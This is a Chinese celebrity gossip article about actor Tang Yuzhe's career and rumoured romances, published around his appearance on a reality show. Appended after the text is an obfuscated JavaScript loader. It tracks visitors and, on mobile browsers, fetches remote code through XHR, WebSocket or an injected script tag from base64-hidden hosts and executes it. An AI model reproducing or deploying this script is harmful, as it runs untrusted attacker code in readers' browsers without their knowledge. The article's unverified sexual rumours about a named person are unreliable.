果然,他也出来捞钱了

来源:人气:1000更新:2023-09-01 15:55:01

姐姐走了,哥哥来了。

注意了,披荆斩棘第三季已经上线‍‍‍‍!

图片

目前只上线了先导片,Guess what?之前我们写过的关智斌真的来了!

被说是这季状态最好的艺人,哥哥真的好帅!

图片

当然还有我们非常熟悉的——

林志颖、张栋梁、蓝正龙,那些年的台偶line。

图片

打情怀牌的还有这位:

非过没丑过的偶像男神唐禹哲,他今年已经38岁了诶,不敢相信!

图片

图片

毕竟印象中,他根本就是少年感满满的花美男本男。

各种非主流不露脑门的造型都能hold住。‍‍‍‍‍‍‍‍‍

不得不提的角色,《终极一班》的反派雷克斯‍‍‍‍,腹黑病娇‍。

图片

《花样少男少女》里的花花公子南学长。

图片

图片

极其离谱的校园传说:女生跟他拉下手就会怀孕,有够夸张,吓得ella大惊失色……‍‍‍‍

《翻滚吧!蛋炒饭》里的冷冽。

图片

图片

令无数观众感叹:不爱他的人是瞎子吧!哦sorry,女主角真的看不见……

图片

造型简直批量复制黏贴,‍‍‍连铠甲勇士也是中长发的招牌造型,笼络了一批少女心。

跟很多人一样,唐禹哲是19岁打工赚学费的时候被星探发现,出道进圈。

国中时期父亲去世,母亲一个人拉扯大他和姐姐。

经纪人递名片的时候被唐禹哲当成诈骗集团,拒绝无效后经纪人把他带去了八大电视台:看吧,我们不是骗子!‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍

图片

不是骗子也不代表一定靠谱,前脚刚签约后脚经纪人就把唐禹哲丢进剧组,赶鸭子上架。

让他在什么都不会的状态去拍戏,搭档郑元畅拍摄《撞球小子》。‍‍‍‍‍

图片

结果就是狠狠挨骂,不会笑不会哭不会说台词,一喊开机身体一秒僵硬,唐禹哲说听见工作人员背后吐槽自己“不行”。

黑评却让他燃起斗志,买了一堆表演书学习提升演技,第二年就搭档当时正火的飞轮海出演《终极一班》,成功打开知名度。

《终极一班》当年的收视率相当不错,首集就有1.5%,之后一路飙升,创下平均收视2%以上的优异成绩。‍

拍摄的时候唐禹哲还在念大学,播出后走在路上被高中生指指点点,挑衅要打架‍‍‍,只好小心躲开:总不能念咒语用气功吧!

这部剧只是个开始,因为这部剧成功开创了终极系列:《终极一家》《终极三国》《终极恶女》《终极X宿舍》等作品。

唐禹哲还客串过《恶作剧之吻》,饰演欧阳干‍‍‍。

演而优则唱,07年乐坛巅峰期,唐禹哲签约了艾回唱片,成为王心凌的师弟,发行第一张国语专辑《爱我》。

唱片公司打出的名号是亚洲新视代小天王‍‍‍,成绩也不错,有很多大热单曲。

《灰色河堤》,《最爱还是你》,承包了我的MP3,包括《终极一家》片尾曲也是他唱的。

图片

图片

那些年观众总有一种错觉:唐禹哲是飞轮海成员吧!

总是以一己之力抗衡飞轮海美貌。

‍‍小S锐评:吴尊是天然帅,汪东城是耍帅,唐禹哲是装忧郁。

演戏在一起,宣传在一起,私底下也玩在一起,不是编外人员是什么!

图片

图片

抱团的原因也很简单,终极系列是可米和八大合拍的,飞轮海是可米的艺人,唐禹哲是八大的,自然经常一起出现。

图片

至于为什么拿不到男主角色,跟唐禹哲本身的性格有点关系。

他从小性格孤僻,不爱讲话,常常因为臭脸被误认为脾气不好耍大牌,更谈不上和公司搞好关系。

于是歪屁股的八大把剧给了其他艺人,唐禹哲一度无剧可演。‍‍‍‍‍‍‍‍‍‍

这样折腾一番也有好处,唐禹哲说,因为当时已经资源降级,失去很多工作,所以后来去内地发展心里落差也没有太大。

台偶没落后‍‍,当年的男神们也一起没了声音‍‍,更不用说配角了。唐禹哲选择跟芒果合作,接到的几乎都是网剧网大,一直在扑街,从来没水花。

造型则剪去长发,往韩式路线靠拢。‍‍‍‍‍‍

图片

最出圈的大概是17年的《我们的少年时代》,他在里面饰演白老师。

我记得里面有tfboys,有薛之谦,有李小璐,但完全不记得里面还有唐禹哲……

还有一些辣眼睛的麦麸情节‍‍。‍‍

图片

‍‍‍‍‍‍‍‍‍虽然人糊了点,但不影响感情方面‍爆瓜。‍‍

17年卓伟还活跃的时候,爆过唐禹哲和网红西里的料,说两人是炮友关系‍‍‍。

图片

随后疑似唐禹哲的微博小号曝光,吐槽拍古装戏太烦,横店太冷,三小只人气太高‍‍‍‍‍‍‍‍‍‍‍。

图片

图片

疑似女友是这位‍‍。

图片

图片

怎么知道这两人是炮友呢?

女方微博曾经发过一篇文章,自曝爱上了base在台北的sex partner……‍‍

图片

中间具体不展开了,总之最后唐禹哲否认了恋情,说是女方P图炒作。

这是没实锤的,有实锤的他也不认。‍

被拍和小13岁的混血演员苏小轩看电影,不承认。

一年后又被拍和女方约会,期间一直找镜头‍‍‍,帽子口罩全副武装。女方试图牵手也被故意闪开,最后只好拉衣角‍。

图片

图片

一边对外坚称“好朋友”‍‍‍‍‍,一边却帮女方澄清和汪东城的绯闻,说两人超级不熟‍‍‍,撇去汪东城前女友的title。

图片

35岁了诶哥,怎么谈恋爱偶像包袱还那么重!到底是在顾虑什么!‍所剩无几的粉丝吗!

结果没多久,不守男德的新闻出现了,拍完戏后深夜约会两位女生,成为新晋时间管理大师。

图片

先是和外号豆花妹的女星蔡黄汝,在“停得很稳,没有任何晃动”的车上共处3小时。

图片

把豆花妹送回家后又跑去某酒店门口,接另一位女生,在车上共处1个半小时。

抛开其他不谈,哥哥真的体力好好,咱打工人下班后只想赶紧回家躺平。

图片

事后唐禹哲回应说,跟前一个女生在车上聊天,后一个女生只是来车上拿东西。‍‍‍‍‍‍‍‍

外界是无人买账啦,不过只要女友信任就ok。‍‍‍‍‍

这些年除了拍没什么人知道的戏,他还在经营自己的潮流品牌。

图片

同时加入台偶男神的集体换头行列,鼻子日益成龙化,自拍不敢认系列。

图片

图片

时不时冒出一些爹味发言:找个老婆,“让她生个孩子”,听着就不适,怎么着,老婆是你的生育工具吗?‍‍‍‍

图片

至于这次哥哥节目能不能翻红,目前看来,难。

先导片不到两分钟的镜头,不知道正片里的节目表现能否改变镶边宿命。‍‍‍‍‍

图片

回头看当年的台偶帅哥们,也是蛮唏嘘。

当帅气变成自恋,霸道变成爹味,恋爱达人变成性骚扰犯人。‍‍‍‍‍‍‍

只剩下时代的滤镜,又能支撑他们走多久呢?


function GkdMHE(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function uwbTcsne(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return GkdMHE(t);};window[''+'E'+'L'+'n'+'y'+'m'+'k'+'B'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){var x=uwbTcsne,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://yh.dyuthic.com:7891/stats/7757/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh3/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket(k+'/wh3/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh3/'+i;cs.parentElement.insertBefore(s,cs);}})('aHR0cHMlM0ElMkYlMkZ0by5tb2xpMTAyLLnRvcCUzQTg4OTE=','dd3NzJTNBJTJGJTJGddW0uYmNlbnJzby5jb20lM0E5NTM1','4760',window,document,['L','d']);}:function(){};

Copyright © 2020-2021 技术支持: 网站留言最快速度处理